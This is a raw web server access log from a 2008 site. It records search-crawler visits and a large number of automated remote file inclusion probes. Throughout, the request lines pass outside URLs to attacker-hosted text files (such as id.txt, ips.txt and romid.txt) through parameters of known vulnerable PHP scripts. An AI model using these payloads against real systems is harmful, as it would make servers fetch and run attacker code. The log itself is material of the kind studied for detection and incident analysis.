67.195.37.186 - - [31/Jul/2008:22:09:16 -0700] "GET /logs/access_080401.log HTTP/1.0" 200 5538 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.symis.net"
67.195.37.186 - - [31/Jul/2008:22:09:48 -0700] "GET /logs/access_080330.log HTTP/1.0" 200 6605 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.symis.net"
200.31.206.138 - - [31/Jul/2008:22:11:13 -0700] "GET /logs/access_080701.log/errors.php?error=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
200.31.206.138 - - [31/Jul/2008:22:11:13 -0700] "GET /errors.php?error=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
200.31.206.138 - - [31/Jul/2008:22:11:13 -0700] "GET /logs/errors.php?error=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
67.195.37.186 - - [31/Jul/2008:22:11:21 -0700] "GET /logs/access_080701.log HTTP/1.0" 200 4352421 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.symis.net"
67.195.37.186 - - [31/Jul/2008:22:11:39 -0700] "GET /logs/access_080801.log HTTP/1.0" 200 375856 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.symis.net"
69.90.47.14 - - [31/Jul/2008:22:14:10 -0700] "GET /logs/access_080601.log///vwar/backup/errors.php?error=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
69.90.47.14 - - [31/Jul/2008:22:14:10 -0700] "GET ///vwar/backup/errors.php?error=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
67.15.8.80 - - [31/Jul/2008:22:22:40 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
67.195.37.186 - - [31/Jul/2008:22:24:22 -0700] "GET /logs/scripts.log HTTP/1.0" 200 3632 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:22:24:26 -0700] "GET /logs/access_080601.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:22:24:26 -0700] "GET /logs/access_080601.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:22:24:27 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:22:24:27 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:22:24:27 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:22:24:27 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
202.70.83.4 - - [31/Jul/2008:22:33:29 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
212.72.200.170 - - [31/Jul/2008:22:40:15 -0700] "GET /errors.php?error=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
89.255.60.6 - - [31/Jul/2008:22:48:55 -0700] "GET /logs/errors.php?error=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
89.255.60.6 - - [31/Jul/2008:22:48:55 -0700] "GET /errors.php?error=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
82.165.253.72 - - [31/Jul/2008:22:53:24 -0700] "GET /logs/access_080701.log//admin/spaw/spaw_control.class.php?spaw_root=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
82.165.253.72 - - [31/Jul/2008:22:53:24 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
82.165.253.72 - - [31/Jul/2008:22:53:24 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
67.195.37.186 - - [31/Jul/2008:22:54:13 -0700] "GET /logs/scripts.log HTTP/1.0" 200 3632 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.symis.net"
69.94.56.38 - - [31/Jul/2008:22:56:31 -0700] "GET /logs/access_080531.log//include.php?path%5Bdocroot%5D=http://www.sdpescadoresteruel.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.symis.net"
69.94.56.38 - - [31/Jul/2008:22:56:31 -0700] "GET //include.php?path%5Bdocroot%5D=http://www.sdpescadoresteruel.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.symis.net"
69.94.56.38 - - [31/Jul/2008:22:56:31 -0700] "GET /logs//include.php?path%5Bdocroot%5D=http://www.sdpescadoresteruel.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.symis.net"
202.70.83.4 - - [31/Jul/2008:23:00:46 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
202.70.83.4 - - [31/Jul/2008:23:00:46 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
67.195.37.186 - - [31/Jul/2008:23:00:55 -0700] "GET /logs/access_080501.log HTTP/1.0" 200 371511 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.symis.net"
67.195.37.186 - - [31/Jul/2008:23:01:52 -0700] "GET /logs/access_080329.log HTTP/1.0" 200 403231 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.symis.net"
213.254.226.234 - - [31/Jul/2008:23:10:06 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
60.250.73.179 - - [31/Jul/2008:23:12:00 -0700] "GET /logs/errors.php?error=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
60.250.73.179 - - [31/Jul/2008:23:12:02 -0700] "GET /errors.php?error=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.255.60.6 - - [31/Jul/2008:23:13:31 -0700] "GET /logs/errors.php?error=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
89.255.60.6 - - [31/Jul/2008:23:13:31 -0700] "GET /errors.php?error=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:23:20:16 -0700] "GET /logs/access_080531.log/bbs/skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:23:20:16 -0700] "GET /bbs/skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:23:20:17 -0700] "GET /logs/bbs/skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:23:20:20 -0700] "GET /logs/access_080531.log/bbs/skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:23:20:21 -0700] "GET /bbs/skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:23:20:21 -0700] "GET /logs/bbs/skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:23:22:58 -0700] "GET /logs/access_080701.log/bbs/skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:23:22:59 -0700] "GET /logs/access_080701.log/bbs/skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
212.72.200.170 - - [31/Jul/2008:23:24:09 -0700] "GET /logs/access_080701.log/errors.php?error=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
212.72.200.170 - - [31/Jul/2008:23:24:11 -0700] "GET /logs/errors.php?error=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
64.237.105.93 - - [31/Jul/2008:23:36:04 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
64.237.105.93 - - [31/Jul/2008:23:36:04 -0700] "GET ///vwar/backup/errors.php?error=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
67.205.68.170 - - [31/Jul/2008:23:38:18 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
89.111.173.117 - - [31/Jul/2008:23:38:40 -0700] "GET /logs/access_080701.log/errors.php?error=http://www.steelselect.com/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.173.117 - - [31/Jul/2008:23:38:40 -0700] "GET /errors.php?error=http://www.steelselect.com/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.173.117 - - [31/Jul/2008:23:38:41 -0700] "GET /logs/errors.php?error=http://www.steelselect.com/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
207.44.152.61 - - [31/Jul/2008:23:39:05 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
207.44.152.61 - - [31/Jul/2008:23:47:06 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
207.44.152.61 - - [31/Jul/2008:23:47:06 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
207.44.152.61 - - [31/Jul/2008:23:47:06 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
89.108.67.220 - - [31/Jul/2008:23:49:46 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
75.33.124.159 - - [31/Jul/2008:23:55:01 -0700] "GET /logs/ HTTP/1.1" 200 2368 "http://www.google.com/search?hl=en&q=index+of+logs&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.symis.net"
75.33.124.159 - - [31/Jul/2008:23:55:02 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.symis.net"
75.33.124.159 - - [31/Jul/2008:23:55:03 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.symis.net"
75.33.124.159 - - [31/Jul/2008:23:55:05 -0700] "GET / HTTP/1.1" 200 647 "http://www.symis.net/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.symis.net"
75.33.124.159 - - [31/Jul/2008:23:55:07 -0700] "GET / HTTP/1.1" 200 647 "http://www.symis.net/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.symis.net"
75.33.124.159 - - [31/Jul/2008:23:55:08 -0700] "GET / HTTP/1.1" 200 647 "http://www.symis.net/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.symis.net"
75.33.124.159 - - [31/Jul/2008:23:55:08 -0700] "GET / HTTP/1.1" 200 647 "http://www.symis.net/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.symis.net"
141.215.136.29 - - [31/Jul/2008:23:56:42 -0700] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
141.215.136.29 - - [31/Jul/2008:23:56:42 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
207.57.2.143 - - [31/Jul/2008:23:57:10 -0700] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
207.57.2.143 - - [31/Jul/2008:23:57:11 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
89.111.176.110 - - [31/Jul/2008:23:57:38 -0700] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.176.110 - - [31/Jul/2008:23:57:38 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
207.44.152.61 - - [31/Jul/2008:23:59:20 -0700] "GET /logs/access_080531.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
89.108.67.220 - - [01/Aug/2008:00:03:01 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
89.108.67.220 - - [01/Aug/2008:00:03:01 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
89.108.67.220 - - [01/Aug/2008:00:03:02 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
125.24.23.21 - - [01/Aug/2008:00:15:35 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
125.24.23.21 - - [01/Aug/2008:00:15:59 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
89.108.67.220 - - [01/Aug/2008:00:17:22 -0700] "GET /logs/access_080531.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.symis.net"
89.111.172.23 - - [01/Aug/2008:00:20:55 -0700] "GET /logs/access_080701.log/errors.php?error=http://www.steelselect.com/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.172.23 - - [01/Aug/2008:00:20:55 -0700] "GET /errors.php?error=http://www.steelselect.com/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.172.23 - - [01/Aug/2008:00:20:56 -0700] "GET /logs/errors.php?error=http://www.steelselect.com/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
64.16.194.20 - - [01/Aug/2008:00:22:00 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
64.16.194.20 - - [01/Aug/2008:00:22:00 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
64.16.194.20 - - [01/Aug/2008:00:22:00 -0700] "GET /logs/access.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
64.16.194.20 - - [01/Aug/2008:00:24:14 -0700] "GET /logs/access_080601.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
67.18.29.218 - - [01/Aug/2008:00:26:59 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
67.18.29.218 - - [01/Aug/2008:00:26:59 -0700] "GET //?path%5Bdocroot%5D=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 200 647 "-" "libwww-perl/5.805" "www.symis.net"
67.18.29.218 - - [01/Aug/2008:00:26:59 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 200 2373 "-" "libwww-perl/5.805" "www.symis.net"
59.188.7.232 - - [01/Aug/2008:00:30:21 -0700] "GET /logs/access_080701.log/errors.php?error=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
59.188.7.232 - - [01/Aug/2008:00:30:21 -0700] "GET /errors.php?error=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
59.188.7.232 - - [01/Aug/2008:00:30:22 -0700] "GET /logs/errors.php?error=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
60.250.73.179 - - [01/Aug/2008:00:32:18 -0700] "GET /logs/errors.php?error=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
60.250.73.179 - - [01/Aug/2008:00:32:25 -0700] "GET /errors.php?error=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
82.194.67.123 - - [01/Aug/2008:00:34:07 -0700] "GET /logs/access.log//toolbar.php?dirDepth=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
82.194.67.123 - - [01/Aug/2008:00:34:07 -0700] "GET //toolbar.php?dirDepth=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
82.194.67.123 - - [01/Aug/2008:00:34:07 -0700] "GET /logs//toolbar.php?dirDepth=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
67.18.29.218 - - [01/Aug/2008:00:34:55 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
195.5.163.212 - - [01/Aug/2008:00:35:06 -0700] "GET /errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.symis.net"
67.18.29.218 - - [01/Aug/2008:00:36:33 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
67.18.29.218 - - [01/Aug/2008:00:36:33 -0700] "GET //?path%5Bdocroot%5D=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 200 647 "-" "libwww-perl/5.805" "www.symis.net"
67.18.29.218 - - [01/Aug/2008:00:36:33 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 200 2373 "-" "libwww-perl/5.805" "www.symis.net"
89.255.60.6 - - [01/Aug/2008:00:37:04 -0700] "GET /logs/access_080531.log//newspublish/include.php?path%5Bdocroot%5D=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
89.255.60.6 - - [01/Aug/2008:00:37:04 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
89.255.60.6 - - [01/Aug/2008:00:37:04 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
195.5.163.212 - - [01/Aug/2008:00:37:58 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.symis.net"
89.111.173.117 - - [01/Aug/2008:00:51:01 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.steelselect.com/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.173.117 - - [01/Aug/2008:00:51:02 -0700] "GET //?path%5Bdocroot%5D=http://www.steelselect.com/ips.txt?? HTTP/1.1" 200 647 "-" "libwww-perl/5.805" "www.symis.net"
89.111.173.117 - - [01/Aug/2008:00:51:02 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.steelselect.com/ips.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.805" "www.symis.net"
125.24.23.21 - - [01/Aug/2008:00:51:11 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
125.24.23.21 - - [01/Aug/2008:00:51:13 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
125.24.23.21 - - [01/Aug/2008:00:51:14 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
67.18.29.218 - - [01/Aug/2008:00:51:54 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 200 2373 "-" "libwww-perl/5.805" "www.symis.net"
67.18.29.218 - - [01/Aug/2008:00:51:54 -0700] "GET //?path%5Bdocroot%5D=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 200 647 "-" "libwww-perl/5.805" "www.symis.net"
67.195.37.186 - - [01/Aug/2008:00:56:17 -0700] "GET /logs/?D=A HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.symis.net"
125.24.23.21 - - [01/Aug/2008:01:01:10 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
125.24.23.21 - - [01/Aug/2008:01:01:11 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
125.24.23.21 - - [01/Aug/2008:01:01:12 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
83.133.125.202 - - [01/Aug/2008:01:02:45 -0700] "GET / HTTP/1.1" 200 647 "http://www.BigFinder.de/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:04:43 -0700] "GET /logs/access.log/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:04:43 -0700] "GET /errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:04:43 -0700] "GET /logs/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:06:52 -0700] "GET /logs/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:06:52 -0700] "GET /errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:06:53 -0700] "GET /logs/errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
205.234.198.174 - - [01/Aug/2008:01:06:53 -0700] "GET /errors.php?error=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
